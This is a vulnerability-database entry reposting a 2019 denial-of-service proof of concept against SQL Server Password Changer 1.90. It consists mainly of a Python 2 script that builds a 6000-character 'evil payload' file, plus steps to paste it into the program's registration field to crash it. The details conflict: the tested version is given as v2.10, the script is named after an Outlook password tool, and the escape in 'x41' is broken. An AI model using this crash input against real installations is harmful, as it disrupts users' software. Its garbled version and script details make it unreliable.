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SQL Server Password Changer 1.90 Denial Of Service

🗓️ 30 Aug 2019 00:00:00Reported by Velayutham SelvarajType 
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SQL Server Password Changer v1.90 Denial of Service exploit on Window

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`#Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit  
# Date: 29.08.2019  
# Vendor Homepage:https://www.top-password.com/  
# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)  
# Tested Version: v2.10  
# Tested on: Windows 8 x64  
# Windows 7 x64  
  
  
# 1.- Run python code :Outlook Password Recovery.py  
# 2.- Open EVIL.txt and copy content to clipboard  
# 3.- Open SQL Server Password Changer and Click 'EnterKey'  
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'  
# 5.- Click 'OK' and you will see a crash.  
  
#!/usr/bin/env python  
buffer = "x41" * 6000  
  
try:  
f=open("Evil.txt","w")  
print "[+] Creating %s bytes evil payload.." %len(buffer)  
f.write(buffer)  
f.close()  
print "[+] File created!"  
except:  
print "File cannot be created"  
`

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30 Aug 2019 00:00Current
0.3Low risk
Vulners AI Score0.3
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